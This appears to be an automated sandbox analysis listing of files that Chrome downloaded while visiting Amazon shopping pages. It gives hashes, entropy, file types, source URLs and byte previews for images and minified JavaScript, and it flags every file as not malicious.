                                                                                                                                                                                                        SHA-256:DC14CFE7159942187114F6DBC5926B2F2646A8278925CE37CB30A84626BCF598
                                                                                                                                                                                                        SHA-512:BDC93C3B429E1D5BA42DF33ECAF061652C07833F0FC4931E5359D00C9ED7542F0C822EC363CAE2BB0ADBDCEB3F5693B54774FA5124C409EC93286B1219AE1A11
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........v.."..............................................................!.1.."AQ.aq...Rt......#2BTcs........35SUbr..$%4du..6CD....................................................!1A..."2Qaq...3BR....#4br.$%...............?...d3..+.L./q3-T.B.d"t.m._..y.$W#.KT..X...G.....h............'.C...(.......@%H....lee{s.....Ra.T.q..<=WRyE6....[..z.[...[..o./.=R....7.Rq.S]_......].".K.....v.&...x..3.Q...vH\."..4l..ln.q.{..=.G...G.^Q..JK.8.].z[.L.....9..<..I.<.8. ....{..~..TX....|........KVT.~b..K...S.h y.=..C..'5....%..C....F.Nlu.............S...$&#.3.H.C.m=...`B.yZ]..W..43G.d.G.N[.?..@..<....Zu>.].K.y..9..>cS..~`.a.......H#.4..?..*...........w..A;.X.7.'K3.D..,?.....y.$.No..U.....*....j.5/.b..4N"$wZ......+..y...W..<|.+3....5/.....BGu.:...|.....I..^.(..i..u.;n...:.sb...........j...{X0.......N.8.$lb.B.!q.UW.$fY.......
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):3600
                                                                                                                                                                                                        Entropy (8bit):7.890786194679337
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:TubK6gqdSQ7cy2Ki/jIgoQ+WWyUCRsTl7uQB:qe6gqB2Zr3Wy6xu0
                                                                                                                                                                                                        MD5:730F9BF453F6D8D9E549D29D91504768
                                                                                                                                                                                                        SHA1:481BCCF46BFEF31227ACE73953960A2177B202CF
                                                                                                                                                                                                        SHA-256:0B7D12BF279A942F5D966963A04549BA48DB2FE3A3F59FDF68CFD9C3D594A2F1
                                                                                                                                                                                                        SHA-512:28CD7576E35324C1C37CEAE2EF42A1ED55D26A2366DC097A18C99C901B7CE15DDE7A9B5B628FFFC5608E99EE69C1A6D21B3FECFBBCDE8756BA936DEA9A9B2CBF
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_TVs_1x._SY116_CB659040198_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t....".................................................................!.1Aaq"2Q....BTr.......4RUb....#$D...Cc....................................................!1..2AR.."BQ.CSqab...............?...QE.QE..E.P..Q@.QE.QE..E.P..Q@.QE.T...q.i.......Q:.^....5>.w....5=ST...1......QS*..ec...F...56..1.S..%.nR.zH...\..(=$.....J..m....m.... S...s........)N.........0KG...A#x!..<....5l....T....~...'_.`.)[.zD...M...PSB.....20.......c.....u..E..y.|..}u....i\M.^....'.L........D%.^7.lw..6...'.G.3h.\}.{..0Q...k........!..L./..d..f:E...|}.~.37..t.w...8...1..$k..x.(...H.B...e..L..;.nE)./.N.C..Z.u$>.o..k..i....^.of..3.;...@j....=^...5ti.z...M....1h..E\0d.....=...6~E/.J....B1..V..Z}Y..2....U...L....CK...'Rp..S*...9......0..[TW.+...Y..-...W(AJx....\..G......r.(.......*s...D.a....;.v..(,..`..K.&.&.t.|R.0.X........F)
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (821)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):119435
                                                                                                                                                                                                        Entropy (8bit):5.310726578286396
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:zdYvqPLlRf9SVENCDQ6/vZMYAtCYw/dU4+ruUrrXVzOetY+YCG92G:evef9SVENCk6/8CYwS4urXVzVNG
                                                                                                                                                                                                        MD5:47B144E02567BC5C6BC2F7E048E8F26E
                                                                                                                                                                                                        SHA1:9BA12ECD4B5C1E79C8EFB4B132A7E785C4745EE7
                                                                                                                                                                                                        SHA-256:6EB4B1AB4FFBCB4172E4A0F3DDBD68F8B896671496820AD5749D21204A34C69A
                                                                                                                                                                                                        SHA-512:87843E2807D4A3DB2D63F9A2F6FE82AAAABBC8A62141DC47A919865844B2421C382007266069BBCF69ABC7606F87B0C62ACC42CC41A8718CE1C99EE2C2B948DB
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(function(f){var g=window.AmazonUIPageJS||window.P,h=g._namespace||g.attributeErrors,e=h?h("JQueryUI_Core_AUIBuild",""):g;e.guardFatal?e.guardFatal(f)(e,window):e.execute(function(){f(e,window)})})(function(f,g,h){f.when("jQuery").register("jQueryUI-core",function(e){(function(b,e){function f(a,c){var d=a.nodeName.toLowerCase();if("area"===d){c=a.parentNode;d=c.name;if(!a.href||!d||"map"!==c.nodeName.toLowerCase())return!1;a=b("img[usemap\x3d#"+d+"]")[0];return!!a&&g(a)}return(/input|select|textarea|button|object/.test(d)?.!a.disabled:"a"===d?a.href||c:c)&&g(a)}function g(a){return b.expr.filters.visible(a)&&!b(a).parents().addBack().filter(function(){return"hidden"===b.css(this,"visibility")}).length}var h=0,k=/^ui-id-\d+$/;b.ui=b.ui||{};b.extend(b.ui,{version:"1.10.3",keyCode:{BACKSPACE:8,COMMA:188,DELETE:46,DOWN:40,END:35,ENTER:13,ESCAPE:27,HOME:36,LEFT:37,NUMPAD_ADD:107,NUMPAD_DECIMAL:110,NUMPAD_DIVIDE:111,NUMPAD_ENTER:108,NUMPAD_MULTIPLY:106,NUMPAD_SUBTRACT:109,PAGE_DOWN:34,PAGE_U
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 200x200, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):10686
                                                                                                                                                                                                        Entropy (8bit):7.952739433473174
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:x2YfiwfZdBCXlQnFbmCjsnc5HzbhGBtHN1cJC4EJNZ502Y1fqqlQMmP0:x2y9ZdcyYCjsc5TCN1cJC4EJNZY1qM1
                                                                                                                                                                                                        MD5:05D3976131DDD36B2F5E1E5991A21AFC
                                                                                                                                                                                                        SHA1:C2D257D568BFFBA36EEDEFE74EBE92B2A1280908
                                                                                                                                                                                                        SHA-256:55ED80112347C554728CEAB3B673CC43AA29C8F6B264465A692A736E80DCD56C
                                                                                                                                                                                                        SHA-512:79285166C08323F71189D3FA7F2CE78A35351490206B93238CF7C6A5BB6A3546C6A164A20BDACDA40CEE6918BC19CAF0C74EBC70C629A2FB3BCD34E4EE6C6429
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!..1."A.Q#2aq....3Brt...$5R..%4eu................................................!1..."AQa.2q.....#.....$3B...............?..t.).JR...).TW\z.......p..K#.DF.@...z..........=Q...Q.=N...W8.p.e.?.B......?t.....{.]:._.C.. ...=Tu.T.;..O.........X..8...{:....-..._]k.Kq.....{.-....=.....P..Eq.].....)*......N.6.+$.C..]..%F...>.....gir.....&...M-..id.M...4..NG........`..fz.".%...J.,.....^..N.. 2G$..D.....;.G.&.zF.T....]:l0....OF..:.&.\..~.}..T.(.|G8.O..t.^......)J.<.)H.R...)H.R...)H.R...$.".v.~...]E.%-..h..."wi=.P~v......F......e....5.."{W.N!(....N...!yc.....fe. y VN.=%..;....3..N..+...$..V....+....I..1.YO+..x5....h.I&............!Y.%..c/`qU..f.5.N..-O$`..t....k..,./.b..I....`.....q.R...m.:xK2A...w...n.D...M....o8RMK:.'..mv.q.,..E...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 250x343, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):11605
                                                                                                                                                                                                        Entropy (8bit):7.940653371084491
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:2hcYJb4LFEwxcx7tyTjQLyQfp/crT7PVHSo6rOsEO3CW6bN5O/V2P/+e:2NktxwyvC1fp/GHhWbObNyV2Ph
                                                                                                                                                                                                        MD5:F98C964BADD9B8B57B656835E194E5F8
                                                                                                                                                                                                        SHA1:88CC5621803511A1DEBFB38FA29395A4EC290813
                                                                                                                                                                                                        SHA-256:961B0BF6E9217A35D5BE097ACB588F04742A0059C1ABED281954F7E75524E225
                                                                                                                                                                                                        SHA-512:393348ED8079B2225366AC3BC32D72EBA0C52964419085CAD868DE0F84BF9C84F4B12FF9F5230241E9B04C59DBB26AC1669C6F1F325D196C4808951EE621FDA9
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/41iWa0vZ9RL.AC_SX250.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......W...."..........5..................................................................R..?I.z..2...NL.i.:....x...vF...a8.Y.8...A..4...X;Q.C..Qc.z....O..<_.{....0$zv. ;O!5....n.]..1.N..R.u.\.h.~.2.R..".A.E.A..R....^..?k.\.....]..t.?.....j.!U..c.Q.:...#.].ST.G...G.R*(.......j.?|......^3...}_.....("......h..(....(.*:....o........W......z..w.N.......p...........y........y..0y.....hy.=....<k..}|..l.....Q2-3`...%..Y.F.hl.Bl..-..g....E.....P...s..|..l.o0...B.#a.._..*{VH.3N..l..4I...g..S..(........{.u.o...M.k......@kr4b....(*....@..D..\.k...,..LX..5....j+.6,.We0&g..v..75.qSo..I..Ue..D.i.\.~..c..{..OU..s~..R.vJ....hIE.2.]# t.z<X :..^./g...}T..q..2.....Pj<....L.../<.y......m.T.......&...._...4..y..Y....??.k.`.n.r..DDr...#.$.[...o.;.m..g...=..L..>5.d..+........q...~[.F..'....'....:.[x.L.....f..,.3".Z
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1388
                                                                                                                                                                                                        Entropy (8bit):7.167766441365266
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:TRe+0CmRckt+45XjBqKzk4DY3vj9MhfRmJp+h3vfOXZW3v21mYsFLgK:TT0r6kI4/Pkzvj9MxRG+hvfOXqv21mhr
                                                                                                                                                                                                        MD5:E09699537E193D79F0491255810C3539
                                                                                                                                                                                                        SHA1:6C420FD62A92FB0FB3DC6DE1F515EF98D633E858
                                                                                                                                                                                                        SHA-256:3E1064B8111479F111E47E89DB4F153A02394947A81ECAC7B36CFC03019386EB
                                                                                                                                                                                                        SHA-512:33147757292460BB9BD0E1C2332EAAEA1365F84F439B72FB20F5F4DE22688528E7CC334C7A07A744598646215FF5CB9E0202C11A112F65378B89E01D4A919FF5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..........t...................................................Qq...12..u..!%5...."Aa#Bb..................................................?..x.r..t_...d.....@N...aY-..N...aY-..N...aY-..N...aY-..N...aY-..N...aY-.X..b..5...:.S.s.......d..VKb...H58?...t..N...aY-..N...aY-..N...aY-..N...aY-..LzGDQ1...@......x.8.'.Y.W.S.i..N...x.).R..F:I.$~5j..h.B...R.:.h.w|.......\......8...;.-(N..uY.0q]....MeJ..K..~.3. ?.l.........Qd.up...MD.u(....9>......6r.:..|8.U.......r.Yi...N...S..N26.5...f.x7..W..=.&....V............c.:"........?0..........2O.7K.[.....M.i3.gZ@G0H...o..R.{.M....O....^.w..M.U..........1...D.tE........~a...m..4...l.;....-.\#'m...J.... ....|...KJ.B..>ta.{...B?.0.sr.j.I..ma`y.Y...i.....L.`z......W..D..^...rp_..S...&....V............c.:".........1.S...v.....c...Jy.......c[`q..I..3.08$q6T.&.....
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5483
                                                                                                                                                                                                        Entropy (8bit):7.846843317049303
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:TEGI8fM8pwrbkCvxbS2C4h4lukRWI8k2bDkKCjqJohRWklnP7BOQfmOoEuI1F7:oGI8fRpuk0M2Ul55aQK+dfWklPwQuz2
                                                                                                                                                                                                        MD5:D500B923B90613D228091EE693B19D3F
                                                                                                                                                                                                        SHA1:6A8FDA352ECCDAFA8D86CA1B111BB8CFD7C14A3D
                                                                                                                                                                                                        SHA-256:4A7DCB5A795B7C87F2FC73AB5A7821FFCCDD72FF15851CA8F0FFCE2519826D4B
                                                                                                                                                                                                        SHA-512:EC08F8499A35C68ECF94D885AB34273A5C33BDB0C7839A7DD52C1A81C030BBD259CAD76B50D1D3987E0F0303EF7075EDEFC4DB130330D67488E8EE6F8ED9643D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4.................................................................X...........@......n....uUj.-...m[6.o...B/v..R.a.H...l....f.z.@....F..^'E.....q.z..n..Y.H..([n0L.t99H...hWx.0.....&..Z'D(....."........aK.Q....W.W);GU.3.......t....n..+.(E...m.n8....\2.9p...O.I..k......)U.u.?8.Q..R.Z)B.>.#W.F.&)...q...%mmO.......+.:.......)F...n.o..G..d.#...~.D..........4..[...R4z.x.h. ..C..}..!..hf#......3...;,....9...Q.<-.uC..N......,..7.^........0....^..y..q..>1>.s.t.^3@....'...J.}..kC....9.^m...Q...k..9l...g6.w..ezg..r..=Y...~.3.....@.....uVk..r..2*8...h......C..$.....Xr"D.P<..91:yl&)C...L.h..9=..5...i.cx.8...#nb8M2.#.../.de<.8fOk..2.W|...J.eW.u./..J..o..X.W|U....../c>G..d(.7.."..'.Z..Xd..;.....5v....<.^q.^X.'k.n.W0.3...............-.........................13... 0A.!2"PQ#$@a............)....
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 171x200, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):10873
                                                                                                                                                                                                        Entropy (8bit):7.973058993269038
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:/iXaG06/gsV/kXIQaoBjOB7dfhRPhvtANdhETlBMtNfyOYYQ1cI4JwrKejjgd:iaGPcJaB/5hmNITlCtNf9I4lH
                                                                                                                                                                                                        MD5:D7C08BF9F865886C219022688B80F01D
                                                                                                                                                                                                        SHA1:66B97441F01BEEDC654408A00B8243A77A11777F
                                                                                                                                                                                                        SHA-256:D325BCBFF8B33394B31F24436C79762E8F42E4F367B3AC35E2BDA451D0B03CE1
                                                                                                                                                                                                        SHA-512:344B55EFB6FCC599FFF1B73517AC26264882A8F06787C301C4FC91F3E0C6A2C4DDDEA04758A62E66BEA94235BE8EAAC5BAB38ADAE4243DDE526E6C0A05437BE4
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."................................................................!..1."2AQaq..#4BRTr.......36Us.......$5tu.....%Db.Sc.....................................................!1.AR....2aq..."#Q..3S..$bCr.............?...(..c...8.g.".`pd#...E.c.q...>...o..E-.me6.P......>7v........51+..\.x...5..]. _.i...p...'u..,.p..,...L.y.3.....3m.T...,..n{..%6..g.X].6....~s}(v(.."..@........;.U......J..8...f..:.....wa.....2=.=.(.w$6.9...5....p].v.].D....M...I)$a.`.9..J(..K..yV;V...fg....#..8..V.oA..7s.......p....t........6.weN.......\..m..u.@.(I......lV.I<A.j....L.N.N..Tyb....U|o...(....\.4S..L....ve-?..C.Z..\..S...?..?...t#R.WQw.....+^......O.........m-%..( F.IYU#@Y.....$...W.z.u[.....vn...N.u.9..|..!W......V...W/.......k..r...2zD.?.|...[.D...x..G...E.L^...Y..l&......`i..eudW..R...}ou...HD..&%a..1j..k.c.t.K....q...B.c./~.?
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (570)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):61068
                                                                                                                                                                                                        Entropy (8bit):5.273369773505074
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:Alc/7w2HtMrXwhCkOLaZwVXCIIo3s7mtgEoW9GVFChA33:AqFarXxC3oTgbWZA
                                                                                                                                                                                                        MD5:55CAB1E940F4E8F9CA3B895895CB57E2
                                                                                                                                                                                                        SHA1:891873B8214ABA3F7FB8A306D3D586807AB9006B
                                                                                                                                                                                                        SHA-256:E30998F16CB81E026CE4A6ABD872A0939BC89376785B7415AA115167087A3521
                                                                                                                                                                                                        SHA-512:3BEFFD01CC8AED079E8AE1A7DDEA09FCC776E408F960BD7CF582D740396CEB919467133F57068DF0B70E0CCD2A06CB1440CBE21516D44701FCBC9129E0E6157B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(function(q){var x=window.AmazonUIPageJS||window.P,F=x._namespace||x.attributeErrors,A=F?F("QuantitySelectorAssets",""):x;A.guardFatal?A.guardFatal(q)(A,window):A.execute(function(){q(A,window)})})(function(q,x,F){function A(n){var f=!1;q.now(n).execute("qsAssetDuplicationGuard",function(a){f=!!a});return f}function L(n,f){if(!A(n))try{q.register(n,f)}catch(a){if(!a.message.includes("reregistered by QuantitySelectorAssets"))throw a;}}function Da(){var n=arguments;return{register:function(f,a){if(!A(f))try{q.when.apply(q,.n).register(f,a)}catch(c){if(!c.message.includes("reregistered by QuantitySelectorAssets"))throw c;}},execute:function(f,a){q.when.apply(q,n).execute(f,a)}}}L("QSAssetDuplicationGuard",function(){return{register:L,when:Da}});"use strict";q.when("QSAssetDuplicationGuard").execute("qsAUIDeps-main-duplication-guard",function(n){n.when("A","QuantitySelectorConstants","a-util").execute("qsAUIDeps-main",function(f,a,c){function h(){w&&w.enableCheckoutCompatibility&&g()}funct
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):3646
                                                                                                                                                                                                        Entropy (8bit):7.851599474948609
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:Tof+vGceX5qNWyDaD9Y94BaMVvXF4ZDLwobQVEWkajUXrP:0f+vPGmWyDaDf1VkLRbQVnk4UT
                                                                                                                                                                                                        MD5:9300223E26C7F980B8ACD167152C7839
                                                                                                                                                                                                        SHA1:FFB0664BA2ADE8400AAEF716CB6C40BD97D66DA0
                                                                                                                                                                                                        SHA-256:5229027DDCD520105EEF22EB06144D7D8214D930DEBF6ACD790C2B57D694AC79
                                                                                                                                                                                                        SHA-512:ED66660A14F4CBA097AC09A71046D8B8B0412CD72E27C5B7674DFFB81E6CE6EFE69995A52043126B15BF8959A6922F992D8DEDBFEE2B3523195DCB0DCB07310B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/home/janiceo/dqc_experiment/xcm_banners_tr_bts21_372x232_pp-d9le7_372x232_ae-en._SY116_CB643136704_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."...............................................................!1A.."Q.aq.#2Br..R..3...$CSb.................................................!1..."2#Aaq...............?..U)J.JR.R....(.)J.JR.R..i..#...8...P..X^eT.9#.Fj?7...m.$......R.0kv.4j7...]...d.+.@)JP.R......)@)JP.R......)@)Q-?.-.].....m....<.d$.3.....fIP.su.I.. .$....\......d~R.....#.r.5.........8$....<T{..K..d3..L.I..G..e.....k..q...+4R..'.@>_%.O".....P....^....1].8.XXo.b..4.......v.&......Ft.{..!...<@v...V....~..*U.......[*... ....."h..N...........Y.^.Q...l.6.w.._...$.0.#..:....p.w..a......H...-.....G.('$..=..z......kHR.....(.)J.JR.R....j..X&h..U....{c..j....kPo.A&Nv.#`~....$.Zg./8.<.:H..>M..:..QU..:...Zo.........?......d,f..C.F.........D....D..j.pdU.....&.o.....ag.Ry. .p7.Fwg8.d...p..+.2......!.g.U{...........cT..............~?.......%.g
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 158x200, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):11454
                                                                                                                                                                                                        Entropy (8bit):7.963296057439344
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:d+IfjZ/g9Zl3t77PjQPexIJM+QXgyu0iEZWqKGFpFTYlm6:pf8bdPPjQPJJMnu0iEZRp0U6
                                                                                                                                                                                                        MD5:CCA2248C3F852BD1331C916BE9EF5F1C
                                                                                                                                                                                                        SHA1:F8E41930352AB06739D4CA7BEFE6B6AE7EA61608
                                                                                                                                                                                                        SHA-256:1D03C0E57B122A198A9EEB1020060965E42CF3B343549779EC01B390B2E6392F
                                                                                                                                                                                                        SHA-512:4FCEAD94FF4F58BC28B0B8780C187B11F4A2A3419D48D9769AB23A98B0422F5C3DE27E5D397CA8FE869CB99F0621976C0A36CB899DCE7BC5997DA8849DB05139
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!..1A."Q.2a.5rs...#RTq.....b....%34BCD.E...t.................................................!1.q....Aa."34QRS..#.$2bc..................?..4....!.*..i(.....l.J.e.o.,.-..[.d.{/...............l.Z...l>.3...C...!..tc.V.t.[.(0...U*...Fb?...e.......[.l.{/..w...6K.ey.^.)..)...... ....d#}.4...SG..8C.9...&...U....N.v.....5i.....T..M.2.2{..[.l.{/..?..?M..e.lG..S..s,......p.V@..R.U@..4,^.Q..eF.+.b/HPf..s....E,..I....?M..e.lg..o...............a.y.J.u.R*..7.!..U.Y..*M...BY...U].:}.r6..+}E.....P...&O..W........W...~._..>c..QA.cX..I:."/z.w.....<.S},.....i.K.U.QT..5..#.$...q.b.....?..~7f..M...>"Q.Ra......Tx.0..........G.....o...a.0.0r.@....<c...m.D.|....~2..M...L .`..@.......\........e.H....A...>.'|....y.......?..<......j..dX..l\...Qz..|.......
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:HTML document, ASCII text
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):71
                                                                                                                                                                                                        Entropy (8bit):4.19644707821733
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:PouVIZxgRO5ZB1XbZ6iFi:haxUkZ3X96x
                                                                                                                                                                                                        MD5:6AAEF67381946BFC1DDACCA8CF7F6C36
                                                                                                                                                                                                        SHA1:E441BBA8B691AD0FFF0BCCB75974880018AB41D6
                                                                                                                                                                                                        SHA-256:73F8AE8C11DAA6AD905107970E55C3C64CD7133561E9E91E650AAB092BA7245E
                                                                                                                                                                                                        SHA-512:99039B90D4F3819EFB0A395D0DC810DEE1A56265D443D24D1C9BDF832EF9F95887E3C417253698A4F76EF176D0ACE6334905F4B7B4E6A8421D2F650B84255EC2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.amazon.ae/rd/uedata?ld&v=0.295223.0&id=V0ARH6GWVSW29RT7ZWDG&sw=1280&sh=1024&vw=1263&vh=907&m=1&sc=V0ARH6GWVSW29RT7ZWDG&ue=4&bb=1327&ns=1367&ne=1575&cb=1583&x2=1584&x3=1597&cf=1598&af=1602&fn=1603&be=1714&fp=1515&fcp=1515&pc=8125&tc=-1068&na_=-1068&ul_=-1723729132210&_ul=-1723729132210&rd_=-1723729132210&_rd=-1723729132210&fe_=-1065&lk_=-1034&_lk=-1034&co_=-1034&_co=-312&sc_=-1033&rq_=-311&rs_=-32&_rs=262&dl_=-26&di_=1757&de_=1758&_de=1758&_dc=8124&ld_=8124&_ld=-1723729132210&ntd=-1&ty=0&rc=0&hob=3&hoe=4&ld=8125&t=1723729140335&ctb=1&rt=cf:17-0-14-3-2-1-0_af:17-0-14-3-2-1-0_ld:47-21-14-4-7-1-1&pty=ShoppingCart&spty=Cart&pti=undefined&tid=V0ARH6GWVSW29RT7ZWDG&aftb=1&lob=1
                                                                                                                                                                                                        Preview:<!DOCTYPE html><html><head><title>x</title></head><body></body></html>.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 156x200, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):8587
                                                                                                                                                                                                        Entropy (8bit):7.9538565708915865
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:KDut92UP35c1i9KtGOlWA7okTKRWyOtS2bVUm6ySAI+iw/RoOgcn:owMUP35cA9KtGO4AmIy2JDB/G+
                                                                                                                                                                                                        MD5:9857EBCDBBE860D5BF07F87140A1CD7C
